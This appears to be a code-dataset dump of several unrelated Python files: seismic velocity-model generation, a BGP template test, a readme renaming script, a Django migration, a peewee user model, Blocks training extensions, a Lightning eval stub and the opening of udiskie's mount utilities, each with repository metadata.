        if np.abs((v - vlast) / vlast) > tol:
            ind.append(ii - 1)
            # NOTE(review): vlast is updated only when a reflection is
            # registered (indentation reconstructed from semantics) — confirm
            # against the upstream source.
            vlast = v

    if pars.minoffset != 0:
        # Non-zero offset: hyperbolic moveout t = sqrt(t0^2 + x^2 / vrms^2).
        dt = 2.0 * pars.dh / vp
        t0 = np.cumsum(dt)
        # NOTE(review): vrms here is sqrt(t0 * cumsum(v^2 dt)); the
        # conventional RMS velocity is sqrt(cumsum(v^2 dt) / t0) — verify
        # this branch (it only runs when pars.minoffset != 0).
        vrms = np.sqrt(t0 * np.cumsum(vp ** 2 * dt))
        tref = np.sqrt(
            t0[ind] ** 2 + pars.minoffset ** 2 / vrms[ind] ** 2) + pars.tdelay
    else:
        # Zero offset: plain vertical two-way time.
        ttime = 2 * np.cumsum(pars.dh / vp) + pars.tdelay
        tref = ttime[ind]

    if pars.identify_direct:
        # Also label the direct arrival at the start of the trace.
        dt = 0
        if pars.minoffset != 0:
            dt = pars.minoffset / vp[0]
        tref = np.insert(tref, 0, pars.tdelay + dt)

    # Mark a window of +- window_width/peak_freq around each arrival time.
    tlabel = np.zeros(pars.NT)
    for t in tref:
        imin = int(t / pars.dt - window_width / pars.peak_freq / pars.dt)
        imax = int(t / pars.dt + window_width / pars.peak_freq / pars.dt)
        if imin <= pars.NT and imax <= pars.NT:
            tlabel[imin:imax] = 1

    return tlabel
def two_way_travel_time(vp, pars):
    """
    Output the two-way travel-time for each cell below the source depth.

    @params:
    vp (numpy.ndarray) : A 1D array containing the Vp profile in depth
    pars (ModelParameter): Parameters used to generate the model

    @returns:
    vp (numpy.ndarray) : Vp profile below the source, cut to the same size
                         as t
    t (numpy.ndarray)  : The two-way travel time of each cell
    """
    below_source = vp[int(pars.source_depth / pars.dh):]
    # Cumulative vertical two-way time, offset by the source delay.
    twt = 2 * np.cumsum(pars.dh / below_source) + pars.tdelay
    # Keep only the samples inside the recorded time window.
    twt = twt[twt < pars.NT * pars.dt]
    below_source = below_source[:len(twt)]
    return below_source, twt


def interval_velocity_time(vp, pars):
    """
    Output the interval velocity resampled on the modelling time grid.

    @params:
    vp (numpy.ndarray) : A 1D array containing the Vp profile in depth
    pars (ModelParameter): Parameters used to generate the model

    @returns:
    vint (numpy.ndarray) : The interval velocity in time (pars.NT samples)
    """
    vpt, twt = two_way_travel_time(vp, pars)
    # Nearest-neighbour interpolation, extrapolating past the last sample.
    nearest = interp1d(twt, vpt,
                       kind="nearest",
                       bounds_error=False,
                       fill_value="extrapolate")
    sample_times = np.arange(pars.NT) * pars.dt
    return nearest(sample_times)
def generate_random_2Dlayered(pars, seed=None):
    """
    This method generates a random 2D model with dipping, possibly
    oscillating layers and optional texture, controlled by pars.

    Important parameters are:
        Model size: pars.NX, pars.NZ, pars.dh
        Number of layers: pars.num_layers, pars.layer_dh_min,
                          pars.source_depth (velocity above the source is
                          kept constant)
        Layer dips: pars.angle_max, pars.dangle_max
        Velocities: pars.vp_max, pars.vp_min, pars.dvmax
        Marine survey: pars.marine, pars.velwater, pars.d_velwater,
                       pars.water_depth, pars.dwater_depth
        Non planar layers: pars.max_osci_freq, pars.min_osci_freq,
                           pars.amp_max, pars.max_osci_nfreq
        Texture: pars.texture_zrange, pars.texture_xrange, pars.max_texture

    @params:
    pars (ModelParameters) : Parameters for model creation.
    seed (int)             : Seed for numpy's global RNG.

    @returns:
    vp (numpy.ndarray)     : The vp model
    vs (numpy.ndarray)     : The vs model (0 for the moment)
    rho (numpy.ndarray)    : The density model (2000 for the moment)
    vels (numpy.ndarray)   : Mean velocity of each layer
    layers (numpy.ndarray) : Mean thickness of each layer at the model center
    angles (numpy.ndarray) : Slope of each layer
    """
    if seed is not None:
        np.random.seed(seed)

    # Determine the minimum and maximum number of layers
    if pars.num_layers == 0:
        nmin = pars.layer_dh_min
        nmax = int(pars.NZ / pars.layer_num_min)
        if nmin < nmax:
            n_layers = np.random.choice(range(nmin, nmax))
        else:
            n_layers = nmin
    else:
        nmin = pars.layer_dh_min
        nmax = int(pars.NZ / pars.layer_num_min)
        n_layers = int(np.clip(pars.num_layers, nmin, nmax))

    # Generate a random number of layers with random thicknesses.
    # BUG FIX: np.int was removed in NumPy 1.24; use the builtin int.
    NZ = pars.NZ
    NX = pars.NX
    dh = pars.dh
    top_min = int(pars.source_depth / dh + 2 * pars.layer_dh_min)
    layers = (nmin + np.random.rand(n_layers) * (nmax - nmin)).astype(int)
    tops = np.cumsum(layers)
    # Merge every layer above top_min into one so the velocity above the
    # source stays constant.
    ntos = np.sum(layers[tops <= top_min])
    if ntos > 0:
        layers = np.concatenate([[ntos], layers[tops > top_min]])

    # Generate random dip angles for each layer, each within dangle_max of
    # the previous one and clipped to +- angle_max.
    n_angles = len(layers)
    angles = np.zeros(layers.shape)
    if n_angles > 1:
        # Guard added: the original indexed angles[1] unconditionally and
        # crashed on single-layer models.
        angles[1] = -pars.angle_max + np.random.rand() * 2 * pars.angle_max
    for ii in range(2, n_angles):
        angles[ii] = angles[ii - 1] + (
            2.0 * np.random.rand() - 1.0) * pars.dangle_max
        if np.abs(angles[ii]) > pars.angle_max:
            angles[ii] = np.sign(angles[ii]) * pars.angle_max

    # Generate a random velocity for each layer. Velocities are somewhat
    # biased to increase in depth via a linear ramp.
    vels = (pars.vp_min
            + np.random.rand() * (pars.vp_max - pars.vp_min - pars.dvmax)
            + np.random.rand(len(layers)) * pars.dvmax)
    ramp = np.abs(np.max(vels) - pars.vp_max) * np.random.rand() + 0.1
    vels = vels + np.linspace(0, ramp, vels.shape[0])
    vels[vels > pars.vp_max] = pars.vp_max
    vels[vels < pars.vp_min] = pars.vp_min
    if pars.marine:
        # First layer is water with randomized velocity and depth.
        vels[0] = pars.velwater + (np.random.rand() - 0.5) * 2 * pars.d_velwater
        layers[0] = int(pars.water_depth / pars.dh +
                        (
                            np.random.rand() - 0.5) * 2 * pars.dwater_depth / pars.dh)

    # Generate the 2D model, from top layers to bottom
    vel2d = np.zeros([NZ, NX]) + vels[0]
    tops = np.cumsum(layers)
    osci = create_oscillation(pars.max_osci_freq,
                              pars.min_osci_freq,
                              pars.amp_max,
                              pars.max_osci_nfreq, NX)
    texture = texture_1lay(2 * NZ,
                           NX,
                           lz=pars.texture_zrange,
                           lx=pars.texture_xrange)
    for ii in range(0, len(layers) - 1):
        # Occasionally add a new oscillation component to the interface.
        if np.random.rand() < pars.prob_osci_change:
            osci += create_oscillation(pars.max_osci_freq,
                                       pars.min_osci_freq,
                                       pars.amp_max,
                                       pars.max_osci_nfreq, NX)
        # Rescale the texture to this layer's velocity. NOTE(review): the
        # previous iteration's scaled texture is renormalized and rescaled
        # cumulatively — confirm this is intended.
        texture = texture / np.max(texture) * (
            np.random.rand() + 0.001) * pars.max_texture * vels[ii + 1]
        for jj in range(0, NX):
            # depth of the layer at location x
            dz = int((np.tan(angles[ii + 1] / 360 * 2 * np.pi) * (
                jj - NX / 2) * dh) / dh)
            # add oscillation component
            if pars.amp_max > 0:
                dz = int(dz + osci[jj])
            # Check if the interface is inside the model
            if 0 < tops[ii] + dz < NZ:
                vel2d[tops[ii] + dz:, jj] = vels[ii + 1]
                if not (pars.marine and ii == 0) and pars.max_texture > 0:
                    vel2d[tops[ii] + dz:, jj] += texture[tops[ii]:NZ - dz, jj]
            elif tops[ii] + dz <= 0:
                vel2d[:, jj] = vels[ii + 1]
                if not (pars.marine and ii == 0) and pars.max_texture > 0:
                    vel2d[:, jj] += texture[:, jj]

    # Output the 2D model, clipped to the velocity bounds.
    vel2d[vel2d > pars.vp_max] = pars.vp_max
    vel2d[vel2d < pars.vp_min] = pars.vp_min
    vp = vel2d
    vs = vp * 0
    rho = vp * 0 + 2000

    return vp, vs, rho, vels, layers, angles
def create_oscillation(max_osci_freq, min_osci_freq,
                       amp_max, max_osci_nfreq, Nmax):
    """
    Build a random interface ondulation of length Nmax as a sum of a random
    number of sinusoids with random frequencies, phases and amplitudes, then
    rescale it to a random fraction of amp_max.

    @params:
    max_osci_freq (float): Maximum spatial frequency (1/m)
    min_osci_freq (float): Minimum spatial frequency (1/m)
    amp_max (float)      : Maximum amplitude of the ondulation
    max_osci_nfreq (int) : Maximum number of frequency components
    Nmax (int)           : Number of samples

    @returns:
    (numpy.ndarray): 1D array of Nmax oscillation values.
    """
    n_components = np.random.randint(max_osci_nfreq)
    component_freqs = np.random.rand(n_components) * (
        max_osci_freq - min_osci_freq) + min_osci_freq
    component_phases = np.random.rand(n_components) * np.pi * 2
    component_amps = np.random.rand(n_components)
    positions = np.arange(0, Nmax)
    profile = np.zeros(Nmax)
    for k in range(n_components):
        profile += component_amps[k] * np.sin(
            component_freqs[k] * positions + component_phases[k])
    peak = np.max(profile)
    if peak > 0:
        profile = profile / peak * amp_max * np.random.rand()
    return profile
if __name__ == "__main__":
    # Quick visual check of the model generators: plot a 1D velocity profile
    # (interval and rms velocity in time) or show a 2D model image.
    import matplotlib.pyplot as plt

    # Initialize argument parser
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--ND",
        type=int,
        default=1,
        help="Dimension of the model to display"
    )
    # Parse the input for training parameters
    args, unparsed = parser.parse_known_args()

    pars = ModelParameters()
    pars.layer_dh_min = 20
    pars.num_layers = 0
    if args.ND == 1:
        vp, vs, rho = generate_random_1Dlayered(pars)
        # The model is constant along X, so one column suffices.
        vp = vp[:, 0]
        vint = interval_velocity_time(vp, pars)
        vrms = calculate_vrms(vp,
                              pars.dh,
                              pars.Npad,
                              pars.NT,
                              pars.dt,
                              pars.tdelay,
                              pars.source_depth)
        plt.plot(vint)
        plt.plot(vrms)
        plt.show()
    else:
        vp, vs, rho = generate_random_2Dlayered(pars)
        plt.imshow(vp)
        plt.show()
bb6ae706c3937af1f37d14d8ff28c0f63fe2eafa | 1,140 | py | Python | basic-working/tests/templates/eos/test_bgppeer.py | 0xmc/hackathon81_configmodel | 89368e830981ac7bbafde47014b8106f17ab4b0f | [
"Apache-2.0"
] | 2 | 2021-02-04T21:06:56.000Z | 2021-02-06T18:36:46.000Z | basic-working/tests/templates/eos/test_bgppeer.py | 0xmc/hackathon81_configmodel | 89368e830981ac7bbafde47014b8106f17ab4b0f | [
"Apache-2.0"
] | null | null | null | basic-working/tests/templates/eos/test_bgppeer.py | 0xmc/hackathon81_configmodel | 89368e830981ac7bbafde47014b8106f17ab4b0f | [
"Apache-2.0"
] | 3 | 2021-01-31T00:37:35.000Z | 2021-02-06T22:33:39.000Z | """BGP peer EOS template tests."""
import unittest
from configmodel.templates.render import render
class TestBGPPeer(unittest.TestCase):
    """BGP peer unit tests for the EOS `bgppeer` template.

    NOTE(review): leading whitespace inside the `expected` strings may have
    been lost in transit; confirm against the actual template output.
    """

    def test_pass_a(self):
        """Local AS only: renders just the `router bgp` stanza."""
        config = {"local_asn": 666}
        actual = render("eos", "bgppeer", config)
        expected = """router bgp 666
"""
        assert actual == expected

    def test_pass_b(self):
        """Good ipv4 only: adds one v4 neighbor statement."""
        config = {"local_asn": "666", "peer_asn": "666", "peer_v4": "192.0.2.1"}
        actual = render("eos", "bgppeer", config)
        expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
"""
        assert actual == expected

    def test_pass_c(self):
        """Good ipv4 and ipv6: adds both neighbor statements."""
        config = {
            "local_asn": "666",
            "peer_asn": "666",
            "peer_v4": "192.0.2.1",
            "peer_v6": "2001:db8:c057:e110::1",
        }
        actual = render("eos", "bgppeer", config)
        expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
neighbor 2001:db8:c057:e110::1 remote-as 666
"""
        assert actual == expected
| 27.142857 | 80 | 0.555263 | 144 | 1,140 | 4.298611 | 0.340278 | 0.048465 | 0.06462 | 0.038772 | 0.681745 | 0.592892 | 0.592892 | 0.441034 | 0.441034 | 0.36349 | 0 | 0.106748 | 0.285088 | 1,140 | 41 | 81 | 27.804878 | 0.652761 | 0.087719 | 0 | 0.482759 | 0 | 0 | 0.308679 | 0.04142 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0.103448 | false | 0.103448 | 0.068966 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb6d53b59a393008d2176d1d9d9d50e3035f5670 | 285 | py | Python | Tool_rename_walk/rename.py | yo1995/Daily_Python_Tasks | 211255deead5023cdcea1db4f49a53eedfe762b6 | [
"MIT"
] | 14 | 2018-05-21T05:12:25.000Z | 2021-11-28T14:49:55.000Z | Tool_rename_walk/rename.py | yo1995/Daily_Python_Tasks | 211255deead5023cdcea1db4f49a53eedfe762b6 | [
"MIT"
] | 2 | 2018-11-28T20:59:37.000Z | 2021-07-27T22:39:33.000Z | Tool_rename_walk/rename.py | yo1995/Daily_Python_Tasks | 211255deead5023cdcea1db4f49a53eedfe762b6 | [
"MIT"
"""Recursively rename every ``readme.md`` under a directory to ``README.md``."""
import os
import sys


def rename_readmes(path):
    """Walk *path* and rename each ``readme.md`` file to ``README.md``.

    :param path: root directory of the walk
    """
    for root, dirs, files in os.walk(path):
        for f in files:
            if f == 'readme.md':
                src = os.path.join(root, f)
                dst = os.path.join(root, 'README.md')
                os.rename(src, dst)


if __name__ == '__main__':
    path = ''
    if not path:
        # BUGFIX: was ``eixt(1)`` (NameError); exit with status 1 when no
        # path is configured.
        sys.exit(1)
    rename_readmes(path)
| 19 | 49 | 0.494737 | 43 | 285 | 3.27907 | 0.488372 | 0.12766 | 0.141844 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 0.361404 | 285 | 14 | 50 | 20.357143 | 0.769231 | 0.035088 | 0 | 0 | 0 | 0 | 0.065934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb742b121f88b8940766d010d218232cdfe09b69 | 475 | py | Python | accounts/migrations/0025_socialmedia_order.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | 2 | 2022-01-24T23:30:18.000Z | 2022-01-26T00:21:22.000Z | accounts/migrations/0025_socialmedia_order.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | accounts/migrations/0025_socialmedia_order.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
# Generated by Django 3.0 on 2020-04-02 13:22
# NOTE: auto-generated migration -- edit only via a new migration.
from django.db import migrations, models


class Migration(migrations.Migration):
    """Add an optional integer ``order`` column to the SocialMedia model."""

    dependencies = [
        ('accounts', '0024_auto_20200330_1441'),
    ]

    operations = [
        # Nullable so existing rows need no default value on migrate.
        migrations.AddField(
            model_name='socialmedia',
            name='order',
            field=models.IntegerField(blank=True, help_text='The order to display the links in, if any', null=True, verbose_name='order'),
        ),
    ]
| 25 | 138 | 0.629474 | 56 | 475 | 5.232143 | 0.803571 | 0.061433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084986 | 0.256842 | 475 | 18 | 139 | 26.388889 | 0.745042 | 0.090526 | 0 | 0 | 1 | 0 | 0.216279 | 0.053488 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb78ef4e70b41375cac6c0abf150fde94d9108b2 | 2,074 | py | Python | application/database/domain/user.py | shivankurkapoor/moleculardating | 4a72c3e92a09ab321e0d92840cc7619857bbab8a | [
"BSD-3-Clause"
] | 1 | 2018-04-24T04:38:33.000Z | 2018-04-24T04:38:33.000Z | application/database/domain/user.py | shivankurkapoor/molecular-dating | 4a72c3e92a09ab321e0d92840cc7619857bbab8a | [
"BSD-3-Clause"
] | null | null | null | application/database/domain/user.py | shivankurkapoor/molecular-dating | 4a72c3e92a09ab321e0d92840cc7619857bbab8a | [
"BSD-3-Clause"
] | null | null | null | from peewee import *
from database import *
class User(Model):
    """Persisted user account record (peewee model).

    Field names match an OAuth userinfo payload (``given_name``,
    ``verified_email``, ``picture``, ...) -- presumably Google sign-in;
    confirm against the caller that builds ``user_info``.
    """

    user_id = CharField(primary_key=True)
    family_name = TextField(default='')
    given_name = TextField(default='')
    email = TextField(default='')
    gender = CharField(default='')
    link = TextField(default='')
    locale = TextField(default='')
    name = TextField(default='')
    picture = TextField(default='')
    verified_email = BooleanField(default=False)
    credentials = TextField(default='')

    class Meta:
        database = db

    # Fields that save_user_info() copies from the userinfo dict.
    _INFO_FIELDS = ('family_name', 'given_name', 'email', 'gender', 'link',
                    'locale', 'name', 'picture', 'verified_email',
                    'credentials')

    def save_user_info(self, user_info):
        """Copy all known non-None fields from *user_info* and persist.

        :param dict user_info: mapping of field name to value; missing keys
            and ``None`` values are skipped.
        """
        for field in self._INFO_FIELDS:
            value = user_info.get(field)
            # ``get`` returns None for both "missing" and "explicitly None",
            # which matches the original ``in`` + ``!= None`` check.
            if value is not None:
                setattr(self, field, value)
        self.save()

    def update_credentials(self, credentials):
        """Replace the stored credentials and persist."""
        self.credentials = credentials
        self.save()
# All User column names -- presumably used by callers to iterate or
# serialize model attributes; verify against usage sites.
user_attr = ['user_id', 'family_name', 'given_name', 'email',
             'gender', 'link', 'locale', 'name', 'picture',
             'verified_email', 'credentials']
| 32.920635 | 81 | 0.616201 | 251 | 2,074 | 4.868526 | 0.151394 | 0.209493 | 0.081833 | 0.106383 | 0.189853 | 0.189853 | 0.103928 | 0 | 0 | 0 | 0 | 0 | 0.253616 | 2,074 | 62 | 82 | 33.451613 | 0.789406 | 0 | 0 | 0.045455 | 0 | 0 | 0.153809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.045455 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb7ae54f93ac463d60bdcacb8b18eb7161938c33 | 3,892 | py | Python | blocks_fuel_classes.py | heikeadel/attention_methods | 2208eec0ec60173585850b69dbfe3aa7a7c270bd | [
"MIT"
] | 1 | 2021-02-01T03:13:11.000Z | 2021-02-01T03:13:11.000Z | blocks_fuel_classes.py | heikeadel/attention_methods | 2208eec0ec60173585850b69dbfe3aa7a7c270bd | [
"MIT"
] | null | null | null | blocks_fuel_classes.py | heikeadel/attention_methods | 2208eec0ec60173585850b69dbfe3aa7a7c270bd | [
"MIT"
] | null | null | null | #!/usr/bin/python
#####
# Description: Blocks Extensions and Fuel classes
# Author: Heike Adel
# Date: 2016
#####
from blocks.extensions import SimpleExtension
import time
import theano
import numpy
from fuel.schemes import BatchScheme
from picklable_itertools import imap
from picklable_itertools.extras import partition_all
################# FUEL #############################################
class ShuffledExampleSchemeBatch(BatchScheme):
    """Batch scheme yielding batches of randomly permuted example indices.

    :param examples: examples (or example count) handled by the scheme
    :param int batch_size: number of examples per batch
    :param int seed: seed for numpy's global RNG (default 987654)
    """

    def __init__(self, examples, batch_size, seed=987654):
        super(ShuffledExampleSchemeBatch, self).__init__(examples, batch_size)
        self.batch_size = batch_size
        # NOTE: seeds numpy's *global* RNG, affecting other RNG users too.
        numpy.random.seed(seed)

    def get_request_iterator(self):
        """Return an iterator over per-batch lists of shuffled indices."""
        # Draw a fresh permutation of all example indices each epoch.
        # (Removed the dead ``indicesShuffled`` local of the original.)
        num_examples = len(list(self.indices))
        permutation = numpy.random.permutation(num_examples)
        return imap(list, partition_all(self.batch_size, permutation))
################# BLOCKS ###########################################
def getF1(tp, numHypo, numRef):
    """Compute and print precision, recall and F1; return the F1 score.

    :param tp: number of true positives
    :param numHypo: number of predicted positives (hypotheses)
    :param numRef: number of reference (gold) positives
    :returns: F1 score; 0 when precision + recall == 0
    """
    # Defaults mirror the original: precision 1 when nothing was predicted.
    precision = 1
    recall = 0
    f1 = 0
    if numHypo > 0:
        precision = 1.0 * tp / numHypo
    if numRef > 0:
        recall = 1.0 * tp / numRef
    if precision + recall > 0:
        f1 = 2 * precision * recall / (precision + recall)
    # Parenthesized single expression: valid under both Python 2 (print
    # statement) and Python 3 (print function), identical output.
    print(str(time.ctime()) + "\tP = " + str(precision) + ", R = " + str(recall) + ", F1 = " + str(f1))
    return f1
class PrintStatus(SimpleExtension):
    """Blocks extension that prints the number of iterations done."""

    def __init__(self, **kwargs):
        super(PrintStatus, self).__init__(**kwargs)

    def do(self, which_callback, *args):
        # print() single-argument form behaves identically under py2 and py3.
        print(self.main_loop.log.status['iterations_done'])
class ModelResults(SimpleExtension):
    """Extension printing reference label, hypothesis and confidence for
    every sample in the given data stream."""

    def __init__(self, layer3, y, model, data_stream, num_samples, batch_size, **kwargs):
        super(ModelResults, self).__init__(**kwargs)
        y_hat = layer3.results()
        # All model inputs except the target variable 'y'.
        self.theinputs = [inp for inp in model.inputs if inp.name != 'y']
        self.predict = theano.function(self.theinputs, y_hat)
        self.data_stream = data_stream
        self.num_samples = num_samples
        self.batch_size = batch_size

    def do(self, which_callback, *args):
        # ``//`` and next() keep py2 behavior (assumes integer counts --
        # TODO confirm) while also working under py3.
        num_batches = self.num_samples // self.batch_size
        epoch_iter = self.data_stream.get_epoch_iterator(as_dict=True)
        print("ref\thypo\tconfidence for 1")
        for i in range(num_batches):
            src2vals = next(epoch_iter)
            inp = [src2vals[src.name] for src in self.theinputs]
            probs = self.predict(*inp)
            y_curr = src2vals['y']
            for j in range(self.batch_size):
                hypo = probs[0][j]
                ref = y_curr[j][0]
                conf = probs[2][j][1]
                print(str(ref) + "\t" + str(hypo) + "\t" + str(conf))
class F1Extension(SimpleExtension):
    """Extension computing accuracy and F1 over a data stream."""

    def __init__(self, layer3, y, model, data_stream, num_samples, batch_size, **kwargs):
        super(F1Extension, self).__init__(**kwargs)
        y_hat = layer3.results()
        # All model inputs except the target variable 'y'.
        self.theinputs = [inp for inp in model.inputs if inp.name != 'y']
        self.predict = theano.function(self.theinputs, y_hat)
        self.data_stream = data_stream
        self.num_samples = num_samples
        self.batch_size = batch_size

    def do(self, which_callback, *args):
        # ``//`` and next() keep py2 behavior (assumes integer counts --
        # TODO confirm) while also working under py3.
        num_batches = self.num_samples // self.batch_size
        epoch_iter = self.data_stream.get_epoch_iterator(as_dict=True)
        tp = 0
        numHypo = 0
        numRef = 0
        total = 0
        tp_tn = 0
        for i in range(num_batches):
            src2vals = next(epoch_iter)
            inp = [src2vals[src.name] for src in self.theinputs]
            probs = self.predict(*inp)
            y_curr = src2vals['y']
            for j in range(self.batch_size):
                hypo = probs[0][j]
                ref = y_curr[j][0]
                # tp counts positive-class hits only (hypo == ref == 1).
                if hypo == 1:
                    numHypo += 1
                    if hypo == ref:
                        tp += 1
                if ref == 1:
                    numRef += 1
                if hypo == ref:
                    tp_tn += 1
                total += 1
        # Fixed "accurracy" typo; removed the unused ``index`` local.
        print("accuracy: ", 100.0 * tp_tn / total)
        getF1(tp, numHypo, numRef)
| 33.264957 | 104 | 0.635149 | 515 | 3,892 | 4.605825 | 0.242718 | 0.060708 | 0.049325 | 0.03204 | 0.505902 | 0.486509 | 0.475548 | 0.475548 | 0.475548 | 0.457841 | 0 | 0.020765 | 0.220452 | 3,892 | 116 | 105 | 33.551724 | 0.761042 | 0.048818 | 0 | 0.425532 | 0 | 0 | 0.022459 | 0.005896 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.074468 | null | null | 0.053191 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb868374d85808f3925d8d87cb20b424d260cc59 | 1,133 | py | Python | src/eval.py | kredde/pytorch-lightning-hydra-mlflow | 13c56a08aa7718b8117ccbc258cba5378e4650ec | [
"MIT"
] | 13 | 2021-08-29T05:15:40.000Z | 2022-03-19T02:40:36.000Z | src/eval.py | kredde/pytorch-lightning-hydra-mlflow | 13c56a08aa7718b8117ccbc258cba5378e4650ec | [
"MIT"
] | null | null | null | src/eval.py | kredde/pytorch-lightning-hydra-mlflow | 13c56a08aa7718b8117ccbc258cba5378e4650ec | [
"MIT"
] | 1 | 2021-11-23T20:22:00.000Z | 2021-11-23T20:22:00.000Z | import logging
from typing import Optional
from pytorch_lightning import LightningModule, LightningDataModule, Trainer
from pytorch_lightning import seed_everything
from omegaconf import DictConfig
from src.utils import config_utils
log = logging.getLogger(__name__)
def eval(config: DictConfig, model: LightningModule, trainer: Trainer, datamodule: LightningDataModule) -> Optional[float]:
    """Run the evaluation pipeline on an already-instantiated model.

    NOTE(review): the name shadows the builtin ``eval``; renaming would
    break callers, so it is kept as-is.

    args:
        config (DictConfig): Configuration composed by Hydra.
        model (LightningModule): The model that is evaluated
        trainer (Trainer)
        datamodule (LightningDataModule)
    """
    # Seed all RNGs for reproducibility when a seed is configured.
    if 'seed' in config:
        seed_everything(config.seed)

    # Push hyperparameters from the config to all attached lightning loggers.
    log.info('Logging hyperparameters!')
    config_utils.log_hyperparameters(
        config=config,
        trainer=trainer,
        model=model,
        datamodule=datamodule,
        logger=trainer.logger,
        callbacks=[],
    )

    # add your evaluation logic here
| 26.97619 | 123 | 0.720212 | 121 | 1,133 | 6.652893 | 0.479339 | 0.052174 | 0.049689 | 0.064596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215357 | 1,133 | 41 | 124 | 27.634146 | 0.905512 | 0.336275 | 0 | 0 | 0 | 0 | 0.039106 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.315789 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bb8e1dcb77ddeb651696cb9409995f302bf0ba3f | 24,733 | py | Python | udiskie/mount.py | LocutusOfBorg/udiskie | 8aa85bb99d44fedc19ec584389072c264877e767 | [
"MIT"
] | null | null | null | udiskie/mount.py | LocutusOfBorg/udiskie | 8aa85bb99d44fedc19ec584389072c264877e767 | [
"MIT"
] | null | null | null | udiskie/mount.py | LocutusOfBorg/udiskie | 8aa85bb99d44fedc19ec584389072c264877e767 | [
"MIT"
] | null | null | null | """
Mount utilities.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from collections import namedtuple
from functools import partial
import logging
from .async_ import AsyncList, Coroutine, Return
from .common import wraps, setdefault, exc_message
from .compat import basestring
from .config import IgnoreDevice, FilterMatcher
from .locale import _
__all__ = ['Mounter']
# TODO: add / remove / XXX_all should make proper use of the asynchronous
# execution.
@Coroutine.from_generator_function
def _False():
    """Coroutine that immediately finishes with the result ``False``."""
    yield Return(False)
def _find_device(fn, set_error=False):
    """
    Decorator for Mounter methods taking a Device as their first argument.

    Enables to pass the path name as first argument and does some common error
    handling (logging).

    :param fn: wrapped generator method of Mounter
    :param bool set_error: unused in this body -- presumably vestigial;
        TODO confirm before removing (callers may pass it)
    """
    @wraps(fn)
    def wrapper(self, device_or_path, *args, **kwargs):
        try:
            # Accept either a Device object or a device/mount path string.
            device = self.udisks.find(device_or_path)
        except ValueError as e:
            self._log.error(exc_message(e))
            # Return an already-finished failing coroutine instead of raising.
            return _False()
        return Coroutine(fn(self, device, *args, **kwargs))
    return wrapper
def _sets_async_error(fn):
    """Decorator registering ``Mounter._error`` as errback on the async
    result, so failures are logged and forwarded to the daemon."""
    @wraps(fn)
    def wrapper(self, device, *args, **kwargs):
        async_ = fn(self, device, *args, **kwargs)
        # Bind the failing method and device so _error can report them.
        async_.errbacks.append(partial(self._error, fn, device))
        return async_
    return wrapper
def _suppress_error(fn):
    """
    Prevent errors in this function from being shown. This is OK, since all
    errors happen in sub-functions in which errors ARE logged.
    """
    @wraps(fn)
    def wrapper(self, device, *args, **kwargs):
        async_ = fn(self, device, *args, **kwargs)
        # Errback returning True marks every error as handled (silenced).
        async_.errbacks.append(lambda *args: True)
        return async_
    return wrapper
def _is_parent_of(parent, child):
"""Check whether the first device is the parent of the second device."""
if child.is_partition:
return child.partition_slave == parent
if child.is_toplevel:
return child.drive == parent and child != parent
return False
class Mounter(object):
    """
    Mount utility.

    Stores environment variables (filter, prompt, browser, udisks) to use
    across multiple mount operations. The mount/unlock/eject/... methods
